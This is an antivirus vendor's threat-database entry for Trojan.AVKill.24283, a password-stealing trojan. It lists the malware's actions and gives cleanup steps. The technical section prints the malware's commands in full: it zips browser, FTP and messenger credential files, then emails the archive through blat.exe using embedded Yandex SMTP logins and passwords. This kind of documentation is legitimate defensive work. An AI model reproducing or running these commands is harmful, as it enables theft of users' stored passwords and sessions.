Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.AVKill.24283

Добавлен в вирусную базу Dr.Web: 2012-10-21

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • <SYSTEM32>\975.wan.san\blat.exe -install -server smtp.yandex.ru -port 587 -f new-logi@yandex.ru -u new-logi -pw wanrltw
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\ICQ\*\Owner.qdb"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mra\Base\mra.dbs"
  • <SYSTEM32>\975.wan.san\blat.exe -body password's -to smsdeluxe23@yandex.ru -attach %WINDIR%\pass.zip
  • <SYSTEM32>\975.wan.san\blat.exe -install -server smtp.yandex.ru -port 587 -f tanya55181@yandex.ru -u tanya55181 -pw 230496swat
  • <SYSTEM32>\975.wan.san\blat.exe -body password's -to server-one@yandex.ru -attach %WINDIR%\pass.zip
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\FileZilla\filezilla.xml"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Opera\Opera\cookies4.dat"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Opera\Opera\wand.dat"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\signons.sqlite"
  • <SYSTEM32>\975.wan.san\7z.exe a -tzip -mx9 "%WINDIR%\pass.zip" "%APPDATA%\Mozilla\Firefox\Profiles\*.default\key3.db"
Запускает на исполнение:
  • <SYSTEM32>\taskkill.exe /f /im MAGENT.EXE
  • <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\insstall2.bat" "
Завершает или пытается завершить
следующие пользовательские процессы:
  • magent.exe
Изменения в файловой системе:
Создает следующие файлы:
  • <SYSTEM32>\975.wan.san\blat.dll
  • <SYSTEM32>\975.wan.san\blat.lib
  • <SYSTEM32>\975.wan.san\7z.exe
  • %TEMP%\1.tmp\pass.zip.tmp
  • %WINDIR%\pass.zip
  • <SYSTEM32>\975.wan.san\blat.exe
  • %TEMP%\1.tmp\blat.dll
  • %TEMP%\1.tmp\insstall2.bat
  • %TEMP%\1.tmp\blat.exe
  • %TEMP%\1.tmp\7z.exe
  • %TEMP%\1.tmp\blat.lib
Удаляет следующие файлы:
  • %TEMP%\1.tmp\insstall2.bat
  • %WINDIR%\pass.zip
Перемещает следующие файлы:
  • %TEMP%\1.tmp\pass.zip.tmp в %WINDIR%\pass.zip
Сетевая активность:
Подключается к:
  • '93.##8.134.11':587
UDP:
  • DNS ASK sm##.yandex.ru
Другое:
Ищет следующие окна:
  • ClassName: '' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке